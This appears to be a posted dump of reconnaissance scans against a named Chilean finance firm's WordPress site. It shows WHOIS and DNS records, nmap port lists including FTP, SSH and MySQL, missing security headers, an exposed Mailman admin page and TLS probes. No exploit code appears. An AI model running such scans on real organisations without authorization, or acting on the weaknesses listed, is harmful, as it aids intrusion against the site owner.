· 5 years ago · Mar 02, 2020, 01:13 PM
1#######################################################################################################################################
2=======================================================================================================================================
3Hostname www.chilefa.cl ISP A Small Orange LLC
4Continent North America Flag
5US
6Country United States Country Code US
7Region California Local time 02 Mar 2020 03:18 PST
8City Los Angeles Postal Code 90014
9IP Address 143.95.110.248 Latitude 34.055
10 Longitude -118.258
11======================================================================================================================================
12######################################################################################################################################
13> www.chilefa.cl
14Server: 10.101.0.243
15Address: 10.101.0.243#53
16
17Non-authoritative answer:
18Name: www.chilefa.cl
19Address: 143.95.110.248
20>
21######################################################################################################################################
22Domain name: chilefa.cl
23Registrant name: CHILE FINANCE ADVISORS S A
24Registrant organisation:
25Registrar name: NIC Chile
26Registrar URL: https://www.nic.cl
27Creation date: 2002-11-25 11:50:39 CLST
28Expiration date: 2022-12-21 08:50:03 CLST
29Name server: dns.site5.com
30Name server: dns2.site5.com
31######################################################################################################################################
32[+] Target : www.chilefa.cl
33
34[+] IP Address : 143.95.110.248
35
36[+] Headers :
37
38[+] Server : nginx/1.14.0
39[+] Date : Mon, 02 Mar 2020 11:34:52 GMT
40[+] Content-Type : text/html; charset=UTF-8
41[+] Transfer-Encoding : chunked
42[+] Connection : keep-alive
43[+] X-Pingback : http://www.chilefa.cl/xmlrpc.php
44[+] Set-Cookie : _icl_current_language=en; expires=Tue, 03-Mar-2020 11:34:52 GMT; Max-Age=86400; path=/
45[+] Content-Encoding : gzip
46
47[+] SSL Certificate Information :
48
49[+] organizationalUnitName : COMODO SSL Wildcard
50[+] commonName : *.accountservergroup.com
51[+] countryName : GB
52[+] stateOrProvinceName : Greater Manchester
53[+] localityName : Salford
54[+] organizationName : Sectigo Limited
55[+] commonName : Sectigo RSA Domain Validation Secure Server CA
56[+] Version : 3
57[+] Serial Number : B46E04C77862C3A76EAC08636AF6A536
58[+] Not Before : Aug 28 00:00:00 2019 GMT
59[+] Not After : Nov 29 00:00:00 2021 GMT
60[+] OCSP : ('http://ocsp.sectigo.com',)
61[+] subject Alt Name : (('DNS', '*.accountservergroup.com'), ('DNS', 'accountservergroup.com'))
62[+] CA Issuers : ('http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt',)
63
64[+] Whois Lookup :
65
66[+] NIR : None
67[+] ASN Registry : arin
68[+] ASN : 62729
69[+] ASN CIDR : 143.95.96.0/19
70[+] ASN Country Code : US
71[+] ASN Date : 1990-09-07
72[+] ASN Description : ASMALLORANGE1, US
73[+] cidr : 143.95.0.0/16
74[+] name : ATHENIX
75[+] handle : NET-143-95-0-0-1
76[+] range : 143.95.0.0 - 143.95.255.255
77[+] description : Athenix Inc.
78[+] country : US
79[+] state : MA
80[+] city : Burlington
81[+] address : C/O Athenix Inc
8210 Corporate Drive
83[+] postal_code : 01803
84[+] emails : ['abuse@asmallorange.com', 'eig-net-team@endurance.com', 'eig-abuse@endurance.com']
85[+] created : 1990-09-07
86[+] updated : 2019-11-27
87
88[+] Crawling Target...
89
90[+] Looking for robots.txt........[ Found ]
91[+] Extracting robots Links.......[ 2 ]
92[+] Looking for sitemap.xml.......[ Not Found ]
93[+] Extracting CSS Links..........[ 8 ]
94[+] Extracting Javascript Links...[ 12 ]
95[+] Extracting Internal Links.....[ 21 ]
96[+] Extracting External Links.....[ 1 ]
97[+] Extracting Images.............[ 18 ]
98
99[+] Total Links Extracted : 62
100
101[+] Dumping Links in /opt/FinalRecon/dumps/www.chilefa.cl.dump
102[+] Completed!
103######################################################################################################################################
104[i] Scanning Site: http://www.chilefa.cl
105
106
107
108B A S I C I N F O
109====================
110
111
112[+] Site Title: CFA – Chile Finance Advisors
113[+] IP address: 143.95.110.248
114[+] Web Server: nginx/1.14.0
115[+] CMS: WordPress
116[+] Cloudflare: Not Detected
117[+] Robots File: Found
118
119-------------[ contents ]----------------
120User-agent: *
121Disallow: /wp-admin/
122Disallow: /wp-includes/
123
124-----------[end of contents]-------------
125
126
127
128W H O I S L O O K U P
129========================
130
131 %%
132%% This is the NIC Chile Whois server (whois.nic.cl).
133%%
134%% Rights restricted by copyright.
135%% See https://www.nic.cl/normativa/politica-publicacion-de-datos-cl.pdf
136%%
137
138Domain name: chilefa.cl
139Registrant name: CHILE FINANCE ADVISORS S A
140Registrant organisation:
141Registrar name: NIC Chile
142Registrar URL: https://www.nic.cl
143Creation date: 2002-11-25 11:50:39 CLST
144Expiration date: 2022-12-21 08:50:03 CLST
145Name server: dns.site5.com
146Name server: dns2.site5.com
147
148%%
149%% For communication with domain contacts please use website.
150%% See https://www.nic.cl/registry/Whois.do?d=chilefa.cl
151%%
152
153
154
155
156G E O I P L O O K U P
157=========================
158
159[i] IP Address: 143.95.110.248
160[i] Country: United States
161[i] State: California
162[i] City: Los Angeles
163[i] Latitude: 34.0549
164[i] Longitude: -118.2578
165
166
167
168
169H T T P H E A D E R S
170=======================
171
172
173[i] HTTP/1.1 200 OK
174[i] Server: nginx/1.14.0
175[i] Date: Mon, 02 Mar 2020 11:35:24 GMT
176[i] Content-Type: text/html; charset=UTF-8
177[i] Connection: close
178[i] X-Pingback: http://www.chilefa.cl/xmlrpc.php
179[i] Set-Cookie: _icl_current_language=en; expires=Tue, 03-Mar-2020 11:35:24 GMT; Max-Age=86400; path=/
180
181
182
183
184D N S L O O K U P
185===================
186
187chilefa.cl. 3599 IN SOA dns.site5.com. root.localhost.localdomain. 2016043000 3600 7200 1209600 86400
188chilefa.cl. 3599 IN NS dns.site5.com.
189chilefa.cl. 3599 IN NS dns2.site5.com.
190chilefa.cl. 3599 IN A 143.95.110.248
191chilefa.cl. 3599 IN MX 10 alt3.aspmx.l.google.com.
192chilefa.cl. 3599 IN MX 1 aspmx.l.google.com.
193chilefa.cl. 3599 IN MX 5 alt1.aspmx.l.google.com.
194chilefa.cl. 3599 IN MX 5 alt2.aspmx.l.google.com.
195chilefa.cl. 3599 IN MX 10 alt4.aspmx.l.google.com.
196chilefa.cl. 3599 IN TXT "google-site-verification=F9VH7S_gYP2QOTTsNGBx1o1G1Q7WOUbnTU9xrGCku9s"
197chilefa.cl. 3599 IN TXT "v=spf1 +a +mx +ip4:174.121.227.2 include:relays.webhost-mail.com ?all"
198
199
200
201
202S U B N E T C A L C U L A T I O N
203====================================
204
205Address = 143.95.110.248
206Network = 143.95.110.248 / 32
207Netmask = 255.255.255.255
208Broadcast = not needed on Point-to-Point links
209Wildcard Mask = 0.0.0.0
210Hosts Bits = 0
211Max. Hosts = 1 (2^0 - 0)
212Host Range = { 143.95.110.248 - 143.95.110.248 }
213
214
215
216N M A P P O R T S C A N
217============================
218
219Starting Nmap 7.70 ( https://nmap.org ) at 2020-03-02 11:35 UTC
220Nmap scan report for chilefa.cl (143.95.110.248)
221Host is up (0.038s latency).
222
223PORT STATE SERVICE
22421/tcp open ftp
22522/tcp open ssh
22680/tcp open http
227443/tcp open https
228
229Nmap done: 1 IP address (1 host up) scanned in 16.71 seconds
230
231
232
233S U B - D O M A I N F I N D E R
234==================================
235
236
237[i] Total Subdomains Found : 1
238
239[+] Subdomain: www.chilefa.cl
240[-] IP: 143.95.110.248
241#####################################################################################################################################
242[+] Starting At 2020-03-02 06:35:44.127275
243[+] Collecting Information On: http://www.chilefa.cl/
244[#] Status: 200
245--------------------------------------------------
246[#] Web Server Detected: nginx/1.14.0
247[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
248- Server: nginx/1.14.0
249- Date: Mon, 02 Mar 2020 11:35:41 GMT
250- Content-Type: text/html; charset=UTF-8
251- Transfer-Encoding: chunked
252- Connection: keep-alive
253- X-Pingback: http://www.chilefa.cl/xmlrpc.php
254- Set-Cookie: _icl_current_language=en; expires=Tue, 03-Mar-2020 11:35:41 GMT; Max-Age=86400; path=/
255- Content-Encoding: gzip
256--------------------------------------------------
257[#] Finding Location..!
258[#] status: success
259[#] country: United States
260[#] countryCode: US
261[#] region: MA
262[#] regionName: Massachusetts
263[#] city: Burlington
264[#] zip: 01803
265[#] lat: 42.4958
266[#] lon: -71.1934
267[#] timezone: America/New_York
268[#] isp: A Small Orange LLC
269[#] org: Athenix Inc
270[#] as: AS62729 A Small Orange LLC
271[#] query: 143.95.110.248
272--------------------------------------------------
273[x] Didn't Detect WAF Presence on: http://www.chilefa.cl/
274--------------------------------------------------
275[#] Starting Reverse DNS
276[-] Failed ! Fail
277--------------------------------------------------
278[!] Scanning Open Port
279[#] 21/tcp open ftp
280[#] 22/tcp open ssh
281[#] 25/tcp open smtp
282[#] 26/tcp open rsftp
283[#] 53/tcp open domain
284[#] 80/tcp open http
285[#] 110/tcp open pop3
286[#] 143/tcp open imap
287[#] 443/tcp open https
288[#] 465/tcp open smtps
289[#] 587/tcp open submission
290[#] 993/tcp open imaps
291[#] 995/tcp open pop3s
292[#] 3306/tcp open mysql
293[#] 8080/tcp open http-proxy
294[#] 8443/tcp open https-alt
295--------------------------------------------------
296[+] Getting SSL Info
297[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: Hostname mismatch, certificate is not valid for 'chilefa.cl'. (_ssl.c:1076)
298--------------------------------------------------
299[+] Collecting Information Disclosure!
300[#] Detecting sitemap.xml file
301[-] sitemap.xml file not Found!?
302[#] Detecting robots.txt file
303[!] robots.txt File Found: http://www.chilefa.cl//robots.txt
304[#] Detecting GNU Mailman
305[!] GNU Mailman App Detected: http://www.chilefa.cl//mailman/admin
306[!] version: 2.1.26
307--------------------------------------------------
308[+] Crawling Url Parameter On: http://www.chilefa.cl/
309--------------------------------------------------
310[#] Searching Html Form !
311[+] Html Form Discovered
312[#] action: http://www.chilefa.cl/
313[#] class: None
314[#] id: None
315[#] method: get
316--------------------------------------------------
317[!] Found 1 dom parameter
318[#] http://www.chilefa.cl//#
319--------------------------------------------------
320[!] 2 Internal Dynamic Parameter Discovered
321[+] http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.1.8.2
322[+] http://www.chilefa.cl/xmlrpc.php?rsd
323--------------------------------------------------
324[!] 2 External Dynamic Parameter Discovered
325[#] http://fonts.googleapis.com/css?family=Droid+Sans:rerular,italic,bold,bolditalic
326[#] http://fonts.googleapis.com/css?family=Droid+Serif:rerular,italic,bold,bolditalic
327--------------------------------------------------
328[!] 47 Internal links Discovered
329[+] http://www.chilefa.cl/wp-content/themes/trymee/style.css
330[+] http://www.chilefa.cl/xmlrpc.php
331[+] http://www.chilefa.cl/feed/
332[+] http://www.chilefa.cl/comments/feed/
333[+] http://www.chilefa.cl/wp-includes/wlwmanifest.xml
334[+] http://www.chilefa.cl/
335[+] http://www.chilefa.cl/es/
336[+] http://www.chilefa.cl/wp-content/themes/trymee/css/ieCss3.php
337[+] http://www.chilefa.cl/wp-content/themes/trymee/css/ie.css
338[+] http://www.chilefa.cl//
339[+] http://www.chilefa.cl/315-2/
340[+] http://www.chilefa.cl/315-2/our-team/
341[+] http://www.chilefa.cl/blog/
342[+] http://www.chilefa.cl/services/
343[+] http://www.chilefa.cl/portfolio/audit/
344[+] http://www.chilefa.cl/portfolio/outsourcing-2/
345[+] http://www.chilefa.cl/portfolio/tax-planning/
346[+] http://www.chilefa.cl/portfolio/mergers-and-acquisitions/
347[+] http://www.chilefa.cl/our-customers/
348[+] http://www.chilefa.cl/contact/
349[+] http://www.chilefa.cl/es/servicios/
350[+] http://www.chilefa.cl/portfolio/doing-business-in-chile-year-2019/
351[+] http://www.chilefa.cl/portfolio/doing-business-in-chile-year-2019/
352[+] http://www.chilefa.cl/portfolio/financial-planning/
353[+] http://www.chilefa.cl/portfolio/financial-planning/
354[+] http://www.chilefa.cl/portfolio/tax-law-reform/
355[+] http://www.chilefa.cl/portfolio/tax-law-reform/
356[+] http://www.chilefa.cl/portfolio/legal-services/
357[+] http://www.chilefa.cl/portfolio/legal-services/
358[+] http://www.chilefa.cl/portfolio/outsourcing-2/
359[+] http://www.chilefa.cl/portfolio/outsourcing-2/
360[+] http://www.chilefa.cl/portfolio/audit/
361[+] http://www.chilefa.cl/portfolio/audit/
362[+] http://www.chilefa.cl/portfolio/tax-planning/
363[+] http://www.chilefa.cl/portfolio/tax-planning/
364[+] http://www.chilefa.cl/portfolio/mergers-and-acquisitions/
365[+] http://www.chilefa.cl/portfolio/mergers-and-acquisitions/
366[+] http://www.chilefa.cl/es/
367[+] http://www.chilefa.cl/international-taxation-affidavits-tax-year-2019-commercial-year-2018/
368[+] http://www.chilefa.cl/international-taxation-affidavits-tax-year-2019-commercial-year-2018/
369[+] http://www.chilefa.cl/chilean-income-tax-return-process-year-2019/
370[+] http://www.chilefa.cl/chilean-income-tax-return-process-year-2019/
371[+] http://www.chilefa.cl/chilean-income-tax-return-ty-2018/
372[+] http://www.chilefa.cl/chilean-income-tax-return-ty-2018/
373[+] http://www.chilefa.cl//mailto:cfa@chilefa.cl
374[+] http://www.chilefa.cl/
375[+] http://www.chilefa.cl/es/
376--------------------------------------------------
377[!] 2 External links Discovered
378[#] http://www.globalfin.cl/wp-content/themes/trymee/images/cache/691be8af14f1e4fe4cdb286a172e6ec8.png
379[#] http://www.linkedin.com/company/chile-finance-advisors
380--------------------------------------------------
381[#] Mapping Subdomain..
382[!] Found 2 Subdomain
383- chilefa.cl
384- www.chilefa.cl
385--------------------------------------------------
386[!] Done At 2020-03-02 06:36:11.547419
387#####################################################################################################################################
388Trying "chilefa.cl"
389;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10234
390;; flags: qr rd ra; QUERY: 1, ANSWER: 11, AUTHORITY: 0, ADDITIONAL: 2
391
392;; QUESTION SECTION:
393;chilefa.cl. IN ANY
394
395;; ANSWER SECTION:
396chilefa.cl. 3600 IN TXT "v=spf1 +a +mx +ip4:174.121.227.2 include:relays.webhost-mail.com ?all"
397chilefa.cl. 3600 IN TXT "google-site-verification=F9VH7S_gYP2QOTTsNGBx1o1G1Q7WOUbnTU9xrGCku9s"
398chilefa.cl. 3600 IN MX 5 alt2.aspmx.l.google.com.
399chilefa.cl. 3600 IN MX 10 alt3.aspmx.l.google.com.
400chilefa.cl. 3600 IN MX 10 alt4.aspmx.l.google.com.
401chilefa.cl. 3600 IN MX 5 alt1.aspmx.l.google.com.
402chilefa.cl. 3600 IN MX 1 aspmx.l.google.com.
403chilefa.cl. 3600 IN A 143.95.110.248
404chilefa.cl. 3600 IN SOA dns.site5.com. root.localhost.localdomain. 2016043000 3600 7200 1209600 86400
405chilefa.cl. 3600 IN NS dns2.site5.com.
406chilefa.cl. 3600 IN NS dns.site5.com.
407
408;; ADDITIONAL SECTION:
409dns2.site5.com. 12888 IN A 108.174.149.181
410dns.site5.com. 12888 IN A 162.210.50.254
411
412Received 462 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 73 ms
413######################################################################################################################################
414; <<>> DiG 9.11.14-3-Debian <<>> +trace chilefa.cl any
415;; global options: +cmd
416. 13923 IN NS m.root-servers.net.
417. 13923 IN NS a.root-servers.net.
418. 13923 IN NS b.root-servers.net.
419. 13923 IN NS c.root-servers.net.
420. 13923 IN NS d.root-servers.net.
421. 13923 IN NS e.root-servers.net.
422. 13923 IN NS f.root-servers.net.
423. 13923 IN NS g.root-servers.net.
424. 13923 IN NS h.root-servers.net.
425. 13923 IN NS i.root-servers.net.
426. 13923 IN NS j.root-servers.net.
427. 13923 IN NS k.root-servers.net.
428. 13923 IN NS l.root-servers.net.
429. 13923 IN RRSIG NS 8 0 518400 20200315050000 20200302040000 33853 . WY2XH1mx0qJdgLPqqJsOrKLKZkq+UTgHnjYvvqDL5h0P45QRA5EtbMeu xYcvz6yJG+0ymJHxA42xE6VzE2qPzJXhJoivrNom2WpvTzSfvbjmLdom Uyy6bnRMuJPkNed9N+NAadwwRP8r+lLE1fhpM/pglUW9oYNC3wVEH/7m QteblRJ0aNBngoTveaMPyNRisU10PjuI4JrcvCB87lj6bSQzVomSfw1O pazeO7C1z9yWxJnflVl1DbhbZBGo2vC4y386bfT59do1vTn69KHDOiMq Izfhcogs3IBk63S63geeBezwXFZgLHPXsOb7Pu7eIlylBUXfrVZ9CllY S7kP5A==
430;; Received 525 bytes from 10.101.0.243#53(10.101.0.243) in 449 ms
431
432cl. 172800 IN NS a.nic.cl.
433cl. 172800 IN NS b.nic.cl.
434cl. 172800 IN NS c.nic.cl.
435cl. 172800 IN NS cl1.dnsnode.net.
436cl. 172800 IN NS cl-ns.anycast.pch.net.
437cl. 172800 IN NS cl1-tld.d-zone.ca.
438cl. 172800 IN NS cl2-tld.d-zone.ca.
439cl. 86400 IN DS 21199 8 2 7D756DFFAB6D3CD9C786FF5C659954C22944FAEF9433EEE26F1D84EB 5370B394
440cl. 86400 IN RRSIG DS 8 1 86400 20200315050000 20200302040000 33853 . G0bZV3jJxEWAc7s5hDCUZltj1aBtpvUUda5C9R5Vd3y65GcPhGI7lnjH 4EX2cXoS0cf2QfQsTtklQCUQ8TTNlt07a6AwfNY6QzkDHjZadAowdcrX y5lRietI0UN7kaQWQPVV46SeEse52K+F02B7CcYx3EDLuecfbCLtRqav V1vZuJ9n6kkIQxOt1xi4FMdmBI6+Yu6ZA7ZTZF5eRySvo+eYwILa++ww z/NkcidZrn3w8WS3aTCS4MQhmoAZdQyfSIglLSygqinyzxC6mg8pq5uf tl/ADCCdojiHl9oRQa5f062Z9G3k12CKtGbmSj1Hws6ZmVekrROZW9TQ HQq01Q==
441;; Received 820 bytes from 192.5.5.241#53(f.root-servers.net) in 414 ms
442
443chilefa.cl. 3600 IN NS dns.site5.com.
444chilefa.cl. 3600 IN NS dns2.site5.com.
445qpmshennmlkkd1kg1ncol4ogqf5g3gsi.cl. 900 IN NSEC3 1 1 2 05320594F252489EFF8BE62F4D5DCDDB QSOI55U8SQE4ONOK6MJS9UJ3NBDM1BB1 NS SOA TXT RRSIG DNSKEY NSEC3PARAM
446qpmshennmlkkd1kg1ncol4ogqf5g3gsi.cl. 900 IN RRSIG NSEC3 8 2 900 20200416093442 20200302103025 24384 cl. cndzCHewljJTBKZGMdofesLR7DK0bqTeU/buoSenf1DNycixYGo25Sr8 DMRmBem3N0W5DdGKVPvLxAdGVJSNr6uAYXjukAqU1ydTGX37X6OTMVZM l5hsIz7oMzw1f6VIP1ZUmUSNvT+ojvk/cWuiCBXrkqbqaeItfwEGSTaB Nc8=
447k7avbqo50vpjqol6cuhvfij76pt6cdqt.cl. 900 IN NSEC3 1 1 2 05320594F252489EFF8BE62F4D5DCDDB KKSJQ43IJIT94OF9N76T5N5S6TIUQ2H5 NS DS RRSIG
448k7avbqo50vpjqol6cuhvfij76pt6cdqt.cl. 900 IN RRSIG NSEC3 8 2 900 20200415063630 20200302103025 24384 cl. Glm1MGpuH9xI4yWKE5Rg4kaEfUsw0fk01iTZyeVNSPZDhU6+j3NWj2LB 64f2/eaDefaMBYRBlvWEeMc/ZuVdaXlLb9HKF7XacynB6hPSWJ315npY oHAex8DWEalYSpX8gl6vy4hhM8oobd322JVAGVar6382GITyoorJCdiG Nqg=
449;; Received 600 bytes from 2001:1398:121:0:190:124:27:10#53(a.nic.cl) in 92 ms
450
451chilefa.cl. 3600 IN SOA dns.site5.com. root.localhost.localdomain. 2016043000 3600 7200 1209600 86400
452chilefa.cl. 3600 IN NS dns2.site5.com.
453chilefa.cl. 3600 IN NS dns.site5.com.
454chilefa.cl. 3600 IN A 143.95.110.248
455chilefa.cl. 3600 IN MX 5 alt1.aspmx.l.google.com.
456chilefa.cl. 3600 IN MX 5 alt2.aspmx.l.google.com.
457chilefa.cl. 3600 IN MX 10 alt4.aspmx.l.google.com.
458chilefa.cl. 3600 IN MX 10 alt3.aspmx.l.google.com.
459chilefa.cl. 3600 IN MX 1 aspmx.l.google.com.
460chilefa.cl. 3600 IN TXT "v=spf1 +a +mx +ip4:174.121.227.2 include:relays.webhost-mail.com ?all"
461chilefa.cl. 3600 IN TXT "google-site-verification=F9VH7S_gYP2QOTTsNGBx1o1G1Q7WOUbnTU9xrGCku9s"
462;; Received 473 bytes from 108.174.149.181#53(dns2.site5.com) in 365 ms
463#####################################################################################################################################
464[*] Performing General Enumeration of Domain: chilefa.cl
465[!] Wildcard resolution is enabled on this domain
466[!] It is resolving to 143.95.110.248
467[!] All queries will resolve to this address!!
468[-] DNSSEC is not configured for chilefa.cl
469[*] SOA dns.site5.com 162.210.50.254
470[*] NS dns.site5.com 162.210.50.254
471[-] Recursion enabled on NS Server 162.210.50.254
472[*] Bind Version for 162.210.50.254 Pie is good in moderation :)
473[*] NS dns2.site5.com 108.174.149.181
474[-] Recursion enabled on NS Server 108.174.149.181
475[*] Bind Version for 108.174.149.181 Pie is good in moderation :)
476[*] MX alt1.aspmx.l.google.com 172.253.118.27
477[*] MX alt2.aspmx.l.google.com 64.233.189.26
478[*] MX alt4.aspmx.l.google.com 108.177.8.27
479[*] MX alt3.aspmx.l.google.com 74.125.28.26
480[*] MX aspmx.l.google.com 173.194.79.26
481[*] MX alt1.aspmx.l.google.com 2404:6800:4003:c05::1b
482[*] MX alt2.aspmx.l.google.com 2404:6800:4008:c07::1b
483[*] MX alt4.aspmx.l.google.com 2607:f8b0:4003:c12::1b
484[*] MX alt3.aspmx.l.google.com 2607:f8b0:400e:c04::1b
485[*] MX aspmx.l.google.com 2a00:1450:4013:c06::1a
486[*] A chilefa.cl 143.95.110.248
487[*] TXT chilefa.cl v=spf1 +a +mx +ip4:174.121.227.2 include:relays.webhost-mail.com ?all
488[*] TXT chilefa.cl google-site-verification=F9VH7S_gYP2QOTTsNGBx1o1G1Q7WOUbnTU9xrGCku9s
489[*] Enumerating SRV Records
490[-] No SRV Records Found for chilefa.cl
491[+] 0 Records Found
492######################################################################################################################################
493 AVAILABLE PLUGINS
494 -----------------
495
496 SessionRenegotiationPlugin
497 CertificateInfoPlugin
498 CompressionPlugin
499 FallbackScsvPlugin
500 HttpHeadersPlugin
501 OpenSslCcsInjectionPlugin
502 EarlyDataPlugin
503 HeartbleedPlugin
504 RobotPlugin
505 OpenSslCipherSuitesPlugin
506 SessionResumptionPlugin
507
508
509
510 CHECKING HOST(S) AVAILABILITY
511 -----------------------------
512
513 143.95.110.248:443 => 143.95.110.248
514
515
516
517
518 SCAN RESULTS FOR 143.95.110.248:443 - 143.95.110.248
519 ----------------------------------------------------
520
521 * TLS 1.2 Session Resumption Support:
522 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
523 With TLS Tickets: OK - Supported
524
525 * OpenSSL CCS Injection:
526 OK - Not vulnerable to OpenSSL CCS injection
527
528 * Session Renegotiation:
529Unhandled exception while running --reneg:
530timeout - timed out
531
532 * ROBOT Attack:
533 UNKNOWN - Received inconsistent results
534
535 * TLSV1 Cipher Suites:
536Unhandled exception while running --tlsv1:
537timeout - timed out
538
539 * Deflate Compression:
540Unhandled exception while running --compression:
541timeout - timed out
542
543 * Downgrade Attacks:
544Unhandled exception while running --fallback:
545timeout - timed out
546
547 * SSLV2 Cipher Suites:
548 Server rejected all cipher suites.
549 Undefined - An unexpected error happened:
550 SSL_CK_RC4_128_WITH_MD5 timeout - timed out
551 SSL_CK_RC4_128_EXPORT40_WITH_MD5 timeout - timed out
552 SSL_CK_RC2_128_CBC_WITH_MD5 timeout - timed out
553 SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5 timeout - timed out
554 SSL_CK_IDEA_128_CBC_WITH_MD5 timeout - timed out
555 SSL_CK_DES_64_CBC_WITH_MD5 timeout - timed out
556 SSL_CK_DES_192_EDE3_CBC_WITH_MD5 timeout - timed out
557
558 * TLSV1_3 Cipher Suites:
559 Server rejected all cipher suites.
560 Undefined - An unexpected error happened:
561 TLS_CHACHA20_POLY1305_SHA256 timeout - timed out
562 TLS_AES_256_GCM_SHA384 timeout - timed out
563 TLS_AES_128_GCM_SHA256 timeout - timed out
564 TLS_AES_128_CCM_SHA256 timeout - timed out
565 TLS_AES_128_CCM_8_SHA256 timeout - timed out
566
567 * OpenSSL Heartbleed:
568Unhandled exception while running --heartbleed:
569timeout - timed out
570
571 * SSLV3 Cipher Suites:
572 Server rejected all cipher suites.
573 Undefined - An unexpected error happened:
574 TLS_RSA_WITH_SEED_CBC_SHA timeout - timed out
575 TLS_RSA_WITH_RC4_128_SHA timeout - timed out
576 TLS_RSA_WITH_RC4_128_MD5 timeout - timed out
577 TLS_RSA_WITH_NULL_SHA256 timeout - timed out
578 TLS_RSA_WITH_NULL_SHA timeout - timed out
579 TLS_RSA_WITH_NULL_MD5 timeout - timed out
580 TLS_RSA_WITH_IDEA_CBC_SHA timeout - timed out
581 TLS_RSA_WITH_DES_CBC_SHA timeout - timed out
582 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
583 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
584 TLS_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
585 TLS_RSA_WITH_AES_256_CBC_SHA256 timeout - timed out
586 TLS_RSA_WITH_AES_256_CBC_SHA timeout - timed out
587 TLS_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
588 TLS_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
589 TLS_RSA_WITH_AES_128_CBC_SHA timeout - timed out
590 TLS_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
591 TLS_RSA_EXPORT_WITH_RC4_40_MD5 timeout - timed out
592 TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 timeout - timed out
593 TLS_RSA_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
594 TLS_ECDH_anon_WITH_RC4_128_SHA timeout - timed out
595 TLS_ECDH_anon_WITH_NULL_SHA timeout - timed out
596 TLS_ECDH_anon_WITH_AES_256_CBC_SHA timeout - timed out
597 TLS_ECDH_anon_WITH_AES_128_CBC_SHA timeout - timed out
598 TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA timeout - timed out
599 TLS_ECDH_RSA_WITH_RC4_128_SHA timeout - timed out
600 TLS_ECDH_RSA_WITH_NULL_SHA timeout - timed out
601 TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
602 TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 timeout - timed out
603 TLS_ECDH_RSA_WITH_AES_256_CBC_SHA timeout - timed out
604 TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
605 TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
606 TLS_ECDH_RSA_WITH_AES_128_CBC_SHA timeout - timed out
607 TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
608 TLS_ECDH_ECDSA_WITH_RC4_128_SHA timeout - timed out
609 TLS_ECDH_ECDSA_WITH_NULL_SHA timeout - timed out
610 TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 timeout - timed out
611 TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 timeout - timed out
612 TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA timeout - timed out
613 TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 timeout - timed out
614 TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 timeout - timed out
615 TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA timeout - timed out
616 TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
617 TLS_ECDHE_RSA_WITH_RC4_128_SHA timeout - timed out
618 TLS_ECDHE_RSA_WITH_NULL_SHA timeout - timed out
619 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
620 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 timeout - timed out
621 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA timeout - timed out
622 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
623 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
624 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA timeout - timed out
625 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
626 TLS_ECDHE_ECDSA_WITH_RC4_128_SHA timeout - timed out
627 TLS_ECDHE_ECDSA_WITH_NULL_SHA timeout - timed out
628 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 timeout - timed out
629 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 timeout - timed out
630 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA timeout - timed out
631 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 timeout - timed out
632 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 timeout - timed out
633 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA timeout - timed out
634 TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
635 TLS_DH_anon_WITH_SEED_CBC_SHA timeout - timed out
636 TLS_DH_anon_WITH_RC4_128_MD5 timeout - timed out
637 TLS_DH_anon_WITH_DES_CBC_SHA timeout - timed out
638 TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
639 TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
640 TLS_DH_anon_WITH_AES_256_GCM_SHA384 timeout - timed out
641 TLS_DH_anon_WITH_AES_256_CBC_SHA256 timeout - timed out
642 TLS_DH_anon_WITH_AES_256_CBC_SHA timeout - timed out
643 TLS_DH_anon_WITH_AES_128_GCM_SHA256 timeout - timed out
644 TLS_DH_anon_WITH_AES_128_CBC_SHA256 timeout - timed out
645 TLS_DH_anon_WITH_AES_128_CBC_SHA timeout - timed out
646 TLS_DH_anon_WITH_3DES_EDE_CBC_SHA timeout - timed out
647 TLS_DH_anon_EXPORT_WITH_RC4_40_MD5 timeout - timed out
